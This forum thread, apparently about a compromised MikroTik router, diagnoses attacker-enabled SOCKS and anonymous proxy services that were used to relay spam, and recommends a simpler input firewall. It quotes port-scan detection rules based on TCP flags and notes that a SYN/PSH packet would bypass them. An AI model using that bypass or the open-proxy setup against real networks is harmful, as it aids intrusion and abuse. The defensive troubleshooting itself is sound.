add action=drop chain=forward comment="Drop Port Scanners" src-address-list="port scanners"
add action=add-src-to-address-list address-list=blocked-addr address-list-timeout=1d chain=input comment="DDoS Protection" connection-limit=100,32 protocol=tcp
add action=tarpit chain=input connection-limit=3,32 protocol=tcp src-address-list=blocked-addr
# Scan detection: these rules only add the source to "port scanners"; the drop
# for that list is higher up and applies to the source's later packets.
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="Add Port Scanners To List" protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="NMAP FIN Stealth scan" protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="SYN/FIN scan" protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="SYN/RST scan" protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="FIN/PSH/URG scan" protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="ALL/ALL scan" protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="NMAP NULL scan" protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
add action=jump chain=input comment="DDoS Flood protect" connection-state=new jump-target=DDoS-Protect
add action=return chain=DDoS-Protect src-address-list=InternalDNSServers
add action=return chain=DDoS-Protect dst-limit=32,256,src-and-dst-addresses/10s
add action=add-dst-to-address-list address-list=DDoS-Victim address-list-timeout=10m chain=DDoS-Protect
add action=add-src-to-address-list address-list=DDoS-Attacker address-list-timeout=10m chain=DDoS-Protect
add action=drop chain=forward comment="Block Bogon IP addresses" src-address=0.0.0.0/8
add action=drop chain=forward dst-address=0.0.0.0/8
add action=drop chain=forward src-address=127.0.0.0/8
add action=drop chain=forward dst-address=127.0.0.0/8
add action=drop chain=forward src-address=x.x.x.x
add action=drop chain=forward dst-address=x.x.x.x

So many rules and so useless in the end…

Your problem is here:

# SOCKS proxy enabled on a non-standard port that none of the posted input
# drop rules cover. To switch it off: /ip socks set enabled=no
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=64312

In other words, the most likely scenario is that at some point in the past your router was hacked using the now well-known WinBox vulnerability. Funnily, if the firewall hasn’t changed since then, the attack must have come from some address in your Exception_List. The SOCKS server was enabled and is now being used by someone from the internet, because your firewall blocks only some selected ports and not this non-standard one.

Edit: And this is probably not intended either:

# Web proxy enabled on a non-standard port with anonymous=yes; the posted input
# rules do not block port 60245. To switch it off: /ip proxy set enabled=no
/ip proxy
set anonymous=yes enabled=yes port=60245

Thanks for your quick response! So I should disable the proxy and the socks, then check with my ISP to verify that all addresses listed in the exclusions list are there purposefully is what I’m getting out of that.

I’d just scrap all chain=input rules and use something simpler. For example, even default firewall is better (don’t forget to define the LAN interface list):

# Default-style input chain: accept established/related/untracked, drop
# invalid, accept ICMP, then drop everything that does not arrive on an
# interface in the LAN list.
# NOTE(review): the last rule depends on the LAN interface list being correct.
# In the posted export the list holds ether1-ether10 and sfp1, ether1 and
# ether4 are ports of bridge-wan, and neither bridge is a member of any list.
# Correct the list before adding the drop (RouterOS Safe Mode helps here), or
# you may lock yourself out or end up treating WAN-facing ports as LAN.
/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN

It allows all input from LAN and blocks everything else.

If for some reason ISP or you need to be able to access your router from outside, put exception before the last drop rule:

# Rules are evaluated top to bottom and a plain "add" appends to the end of the
# chain, so this accept has to be moved above the final drop (or added with
# place-before=) to have any effect. Keep Exception_List as small as possible,
# since every address in it can reach WinBox.
add action=accept chain=input dst-port=8291 protocol=tcp src-address-list=Exception_List

But Exception_List with so many addresses as the current one doesn’t seem like the best idea anyway.

On second look, if x.x.x.x is only one address, then WinBox should be available only from there:

# The address= setting limits the source addresses from which the winbox
# service accepts connections. The value is redacted here; the original poster
# replies that five addresses are actually configured.
/ip service
set winbox address="x.x.x.x"

There’s actually 5 addresses listed for WinBox, not including local addresses. The ISP accesses the router remotely yes, so I’ll have them look over those addresses there as well.

Should I do anything about port 25 since the blacklisting sites say the mail is being sent out through there?

If spammers use your SOCKS server to send mail, outgoing traffic from you will be to port 25 and to random remote mailservers. If you stop SOCKS, it will stop. There’s nothing more to do.

Your IP address will still be on several blacklists for a while. Decent ones will drop it automatically after a varying period of time. Some would keep it forever, but allow you to request removal. And some can list you as spammer even ten years from now.

Gotcha, seriously thank you for the input, very much appreciated. I’ll make the necessary changes and report back.

In addition to disabling the proxy and socks services, you need to change all passwords (and ideally usernames) for the router as well. Otherwise the attackers will probably log back in and turn on the socks and proxy services again.

# Excerpt quoted from the posted export. The forum rendering replaced the
# straight quotes with typographic ones and dropped the line-continuation
# backslashes, so it will not paste back into a RouterOS terminal as shown.
# Each rule matches one fixed TCP flag combination and lists the source in
# "port scanners" for two weeks; flag combinations not listed are not matched.
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“NMAP FIN Stealth scan”
protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“SYN/FIN scan” protocol=tcp
tcp-flags=fin,syn
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“SYN/RST scan” protocol=tcp
tcp-flags=syn,rst
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“FIN/PSH/URG scan” protocol=tcp
tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“ALL/ALL scan” protocol=tcp
tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“NMAP NULL scan” protocol=tcp
tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg

This seems so pointless. For example, I can send a SYN/PSH flagged packet and get by those rules.


# Excerpt quoted from the posted export (continuation backslashes lost in the
# forum rendering). The target addresses are redacted, so it cannot be told
# from the post whether they are internal hosts or external ones.
# NOTE(review): RouterOS's built-in destination-NAT chain is named dstnat;
# "chain=dst-nat" as printed would be a custom chain that is reached only via a
# jump rule. Check the packet counters to see whether these rules match.
add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=
x.x.x.x 80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=
x.x.x.x to-ports=3333
add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=
x.x.x.x to-ports=4444
add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=
x.x.x.x to-ports=4444

With these static NATs, you may have some compromised devices on your internal network due to exposure to the internet. I’d suggest assessing each of those devices.